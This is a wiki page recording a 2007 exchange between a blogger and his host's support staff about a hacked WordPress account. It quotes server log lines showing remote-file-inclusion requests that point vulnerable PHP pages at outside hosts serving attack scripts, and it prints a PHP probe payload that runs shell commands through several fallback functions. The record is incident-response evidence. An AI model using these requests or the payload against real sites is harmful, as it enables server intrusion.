• If you are citizen of an European Union member nation, you may not use this service unless you are at least 16 years old.

  • You already know Dokkio is an AI-powered assistant to organize & manage your digital files & messages. Very soon, Dokkio will support Outlook as well as One Drive. Check it out today!

View
 

Joyent20071107

Page history last edited by Chris Messina 16 years, 10 months ago

Sent 20071107 via customer.joyent.com


 

I'm afraid that my account has been compromised. I don't know how or what happened (or how to figure it out) but if you could look into it, that'd be great.

 

Anyway, I logged into my /blog account today on NELSON and saw two directories that I didn't recognize:

 

blog/rh4m4.t35.com

blog/www.kolortavil.org

 

These both seem to direct to spam sites, so I presume that they've gained access to my account, though I don't know how.

 

Can you check the logs and let me know what you find? Thanks,

 

Chris


 

Response from Kristie Wells at Nov 7, 2007 7:44 PM:

 

Chris,

 

I meant to include this piece in your support ticket.


88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:02 +0000] "GET /blog/category/what-i-do/drupal/page/5/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 503 323 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /blog/category/what-i-do/drupal/page/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 200 13257 "-" "libwww-perl/5.79"

The breach appears to be from a dedicated IP in france for a probably known script kiddie so we are blocking that IP from all the shared servers.

 

Cheers,

Kristie


 

My reply at Nov 7, 2007 7:51 PM:

 

Cool. It turns out that it was the wp-super-cache plugin [1]. I've

seen about 4-5 other reports of the same problem:

 

http://twitter.com/stefsull/statuses/396379352

http://twitter.com/tiffanybbrown/statuses/396344922

http://twitter.com/tiffanybbrown/statuses/396362442

http://tiffanybbrown.com/2007/11/07/damn-my-vps-is-being-cracked/

 

;)

 

Thanks for the follow up.

 

Chris

 

[1] http://wordpress.org/support/topic/142480?replies=2


 

Notes

 

Here is the script that was at the end of ok.txt:

 


<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

 

Further reviewing my logs I found:

 


194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /blog/2007/07/18/wordpressmu-making-a-smart-platform-choice/start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 302 "-" "libwww-perl/5.79"
194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 243 "-" "libwww-perl/5.79"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8333 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:20 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8237 "-" "libwww-perl/5.808"
 
81.173.18.20 - - [08/Nov/2007:22:14:01 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/%3Edish-on-the-always-use-prot.../index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 412 312 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 300 491 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 8386 "-" "libwww-perl/5.805"

222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8651 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:49 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8747 "-" "libwww-perl/5.803"

Comments (0)

You don't have permission to comment on this page.